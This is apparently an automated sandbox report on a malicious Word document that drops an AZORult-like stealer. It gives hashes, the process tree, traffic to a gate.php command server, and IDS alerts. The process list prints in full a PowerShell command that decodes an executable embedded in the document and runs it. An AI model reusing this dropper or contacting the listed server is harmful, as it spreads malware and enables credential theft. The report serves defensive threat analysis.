- Description: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: B0.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'o{hwlspM4'zzljvyW4{yh{ZB00d{lzmmv+XKaXKa{u|vJXKazl{i+bzl{i+/3.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/zl{IssHl{py^AAdlspMXKaVPXKatl{zZbB97'D4'dp+bzl{i+lzslMM7Ddp+bzl{i+08'xl4'dp+bzl{i+/mPlzsLLM7'D'dp+bzl{i+07'xl4'dp+bzl{i+/mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB;2{lzmmv+D{lzmmv+Bp+D{lzmmv+00J>7'xl4'd:2p+bzl{i+/'kuh4'0J>7'xl4'd92p+bzl{i+/'kuh4'0J>
- Architecture: WINDOWS
- SHA256: e82a7f1a1a5a72cec760b74f1f76fe535c6934a09fedf955559596ce7354e075
- MD5: aa317af7a2307040e7fd3a4a1df33430
- SHA1: 93c6fd4e3698d626a8ba78016151d9ca74390b85
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Hybrid Analysis
Analysed 5 processes in total.
- WINWORD.EXE /n "C:\aa317af7a2307040e7fd3a4a1df33430.doc" (PID: 556)
- powershell.exe Copy-Item -Path 'C:\aa317af7a2307040e7fd3a4a1df33430.doc' -Destination ([System.IO.Path]::GetTempPath()+'\f.doc');$bytes=[System.IO.File]::ReadAllBytes(([System.IO.Path]::GetTempPath()+'\f.doc'));$offset=0;for($i=0;$i -lt $bytes.Count;$i++){if(($bytes[$i] -eq 0x7C) -and ($bytes[$i+1] -eq 0x7C) -and ($bytes[$i+2] -eq 0x7C) -and ($bytes[$i+3] -eq 0x7C)){$offset=$i;}}$offset=$offset+4;for($i=0;$i -lt $bytes.Count;$i++){if($bytes[$i] -eq 0){$bytes[$i] = 0xFE}ElseIf($bytes[$i] -eq 1){$bytes[$i]=0xFF}else{$bytes[$i] -= 0x2}};[System.IO.File]::WriteAllBytes([System.IO.Path]::GetTempPath()+'\TAMOIV.exe',($bytes[$bytes.Count..$offset]));Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\TAMOIV.exe'); (PID: 2904)
- TAMOIV.exe (PID: 3716), AV detections 28/67
- TAMOIV.exe (PID: 2192), AV detections 28/67
- DW20.EXE -x -s 1420 (PID: 2540)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
eualube.com | 104.168.177.9 (TTL: 14399) | NetEarth One, Inc. | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
104.168.177.9 | 80/TCP | tamoiv.exe (PID: 2192) | United States |
HTTP Traffic
Endpoint | Request | URL |
---|---|---|
104.168.177.9:80 (eualube.com) | POST | eualube.com/conto/gate.php |
104.168.177.9:80 (eualube.com) | POST | eualube.com/conto/gate.php |
Request headers of the first POST (the second is identical except for Content-Length: 674):
POST /conto/gate.php HTTP/1.1
Host: eualube.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Referer: eualube.com/conto/gate.php
Connection: close
Content-Length: 264
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAyFLe1eF4NAHbJq0
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 104.168.177.9:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no accept headers | 2022985 |
local -> 104.168.177.9:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN AZORult Variant Checkin | 2821358 |
local -> 104.168.177.9:80 (TCP) | A Network Trojan was detected | ET TROJAN Trojan Generic - POST To gate.php with no accept headers | 2022985 |
local -> 104.168.177.9:80 (TCP) | A Network Trojan was detected | CrowdStrike Azorult V1 traffic | 181717601 |
local -> 104.168.177.9:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN AZORult Variant Checkin | 2821358 |
local -> 104.168.177.9:80 (TCP) | A Network Trojan was detected | CrowdStrike Azorult V1 traffic | 181717601 |
Extracted Strings
Extracted Files
Malicious 1
TAMOIV.exe
- Size: 1.2MiB (1246720 bytes)
- Type: peexe executable
- Description: PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result: Labeled as "Trojan.Agent" (28/67)
- Runtime Process: TAMOIV.exe (PID: 3716)
- MD5: 075a69bf33193c1aa225d32ca3aa3aa5
- SHA1: d7437e6f54930f17e3f648cde84fe262a1d6b6d7
- SHA256: 0e8b7e8d05859698f23128f04c92894bacf552380b3ff63159ab76cabda9c7d7
Informative Selection 1
Desktop
- Size: Unknown (0 bytes)
- Type: empty
- Runtime Process: TAMOIV.exe (PID: 2192)
Informative 11
aa317af7a2307040e7fd3a4a1df33430.LNK
- Size: 573B (573 bytes)
- Type: lnk
- Description: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Feb 17 00:42:47 2018, mtime=Sat Feb 17 00:42:47 2018, atime=Sat Feb 17 00:43:00 2018, length=1369092, window=hide
- Runtime Process: WINWORD.EXE (PID: 556)
- MD5: f59c0e20277f73228b7afe46eb63c727
- SHA1: 3a7bc4ab344ecb596f09a36808c9681e57c69e63
- SHA256: c1c5e1db0244dd2e228b4dd0b2a0016658d7a2dd8fd0b1615ddc7f661af25162

index.dat
- Size: 193B (193 bytes)
- Type: data
- Runtime Process: WINWORD.EXE (PID: 556)
- MD5: 03e144445f9daf041b6af59e656f3241
- SHA1: d865c1169b394fa2afe3d823fed6c37a134fb76a
- SHA256: 565bae6448783b851a64009c059dcef861713018957b6e209b5b17ebaca40e40

~$Normal.dotm
- Size: 162B (162 bytes)
- Type: data
- Runtime Process: WINWORD.EXE (PID: 556)
- MD5: 6d975baa62b560be2a37a88a814f3baa
- SHA1: 3a0591d8c5d95c79d0ce2cd32c471804594a73f5
- SHA256: d8dad476763643a7b78c3de7337dfef3cdd78a53e71f1d0b28bdec8f429deee7

6LACNQ6NXQXSDUZITFDL.temp
- Size: 7.8KiB (8016 bytes)
- Type: data
- Runtime Process: powershell.exe (PID: 2904)
- MD5: b83e99aca96faa3715ae185347f666ff
- SHA1: 0516d2379bbf9e75418691efe5e960917450823f
- SHA256: 46c73c03bedbe8eb14fdc3537e59fc81fdf5948494a694fc759bd00472a1f71d

aa317af7a2307040e7fd3a4a1df33430.doc.lnk
- Size: 649B (649 bytes)
- Type: lnk
- Description: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Sat Feb 17 00:42:47 2018, mtime=Sat Feb 17 00:42:47 2018, atime=Sat Feb 17 00:43:00 2018, length=1369092, window=hide
- Runtime Process: WINWORD.EXE (PID: 556)
- MD5: dc6dd47355e3dc2264af7f7b8b42f30e
- SHA1: 5f80d769d37be02d7829679544e81389d2ef0406
- SHA256: 34c7cf4ac47101ca7a4cc4d4b79116528969a9bf05c459d96d29b5c0b8ca461e

~WRD0000.tmp
- Size: 107KiB (109568 bytes)
- Type: doc office
- Description:
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: B0.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'o{hwlspM4'zzljvyW4{yh{ZB00d{lzmmv+XKaXKa{u|vJXKazl{i+bzl{i+/3.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/zl{IssHl{py^AAdlspMXKaVPXKatl{zZbB97'D4'dp+bzl{i+lzslMM7Ddp+bzl{i+08'xl4'dp+bzl{i+/mPlzsLLM7'D'dp+bzl{i+07'xl4'dp+bzl{i+/mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB;2{lzmmv+D{lzmmv+Bp+D{lzmmv+00J>7'xl4'd:2p+bzl{i+/'kuh4'0J>7'xl4'd92p+bzl{i+/'kuh4'0J>7'xl4'd82p+bzl{i+/'kuh4'0J>7'xl4'dp+bzl{i+//mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB7D{lzmmv+B00.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb//zl{IssHkhlYAAdlspMXKaVPXKatl{zZbDzl{i+B0.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'uvp{hup{zlK4'.O[HWM.'o{hW4'tl{P4wvJ'llXKasslozyl~vwXKa, Author: Caleb Cheng, Template: Normal, Last Saved By: caive, Revision Number: 60, Name of Creating Application: Microsoft Office Word, Total Editing Time: 46:00, Create Time/Date: Sat Feb 3 02:00:00 2018, Last Saved Time/Date: Fri Feb 16 01:17:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Runtime Process: WINWORD.EXE (PID: 556)
- MD5: 93e601b6b19e4dc89540cde674f16845
- SHA1: 66854d41905736b7d7b8d54429c0c8ae5d678f17
- SHA256: 8e95654a0c534a8274b115f3d74ce583842df7ce5ab6d54dcff67fcb5f4d1beb

~WRS{F1A3FD71-A43B-4BAC-9D39-CFFD2B377A63}.tmp
- Size: 1KiB (1024 bytes)
- Type: data
- Runtime Process: WINWORD.EXE (PID: 556)
- MD5: 5d4d94ee7e06bbb0af9584119797b23a
- SHA1: dbb111419c704f116efa8e72471dd83e86e49677
- SHA256: 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1

~$317af7a2307040e7fd3a4a1df33430.doc
- Size: 162B (162 bytes)
- Type: data
- Runtime Process: WINWORD.EXE (PID: 556)
- MD5: 6d975baa62b560be2a37a88a814f3baa
- SHA1: 3a0591d8c5d95c79d0ce2cd32c471804594a73f5
- SHA256: d8dad476763643a7b78c3de7337dfef3cdd78a53e71f1d0b28bdec8f429deee7

MSO3081.acl
- Size: 37KiB (37762 bytes)
- Type: data
- MD5: 65ab254f8ba1839c4e86550e83a99bfd
- SHA1: 3afc326a413163ac3c6f28cc716202a871156235
- SHA256: 1b3df51f8e319440b95d46863542980b034558917d4047b3657fba436ca23e8d

~WRD0002.tmp
- Size: 107KiB (109568 bytes)
- Type: doc office
- Description:
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: B0.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'o{hwlspM4'zzljvyW4{yh{ZB00d{lzmmv+XKaXKa{u|vJXKazl{i+bzl{i+/3.llXKa]PVTH[c.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/zl{IssHl{py^AAdlspMXKaVPXKatl{zZbB97'D4'dp+bzl{i+lzslMM7Ddp+bzl{i+08'xl4'dp+bzl{i+/mPlzsLLM7'D'dp+bzl{i+07'xl4'dp+bzl{i+/mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB;2{lzmmv+D{lzmmv+Bp+D{lzmmv+00J>7'xl4'd:2p+bzl{i+/'kuh4'0J>7'xl4'd92p+bzl{i+/'kuh4'0J>7'xl4'd82p+bzl{i+/'kuh4'0J>7'xl4'dp+bzl{i+//mp022p+B{u|vJXKazl{i+'{s4'p+B7Dp+/yvmB7D{lzmmv+B00.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb//zl{IssHkhlYAAdlspMXKaVPXKatl{zZbDzl{i+B0.jvkXKamc.20/o{hWwtl[{lNAAdo{hWXKaVPXKatl{zZb/'uvp{hup{zlK4'.O[HWM.'o{hW4'tl{P4wvJ'llXKasslozyl~vwXKa, Author: Caleb Cheng, Template: Normal, Last Saved By: caive, Revision Number: 60, Name of Creating Application: Microsoft Office Word, Total Editing Time: 48:00, Create Time/Date: Sat Feb 3 02:00:00 2018, Last Saved Time/Date: Fri Feb 16 01:17:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0
- MD5: 5818b38d07f1a54b1cf2d77edf909a9f
- SHA1: 079bc8e9f572b4900c095c6accf1358acb5a8505
- SHA256: 4b1475c623e881c8496ed41da295294b657cf72e66eaa4d8c9364a528d223abe

1571463673.cvr
- Size: 2KiB (2040 bytes)
- Type: data
- MD5: 76334ff4fca0ddf0471e50e1f89063f0
- SHA1: 9bbb1ced70e63ea9d81148d97e7acf10230ddfa1
- SHA256: 1d2ee8d47d5986e38cbd2feadeeed761a713d9d4c9273f1bc680cb96e17b411e

Notifications
Runtime
- A process crash was detected during the runtime analysis
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Extracted file "~$317af7a2307040e7fd3a4a1df33430.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/d8dad476763643a7b78c3de7337dfef3cdd78a53e71f1d0b28bdec8f429deee7/analysis/1518799770/")
- Extracted file "~WRD0000.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/8e95654a0c534a8274b115f3d74ce583842df7ce5ab6d54dcff67fcb5f4d1beb/analysis/1518799771/")
- Extracted file "~WRD0002.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/4b1475c623e881c8496ed41da295294b657cf72e66eaa4d8c9364a528d223abe/analysis/1518799772/")
- Not all IP/URL string resources were checked online
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-70" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)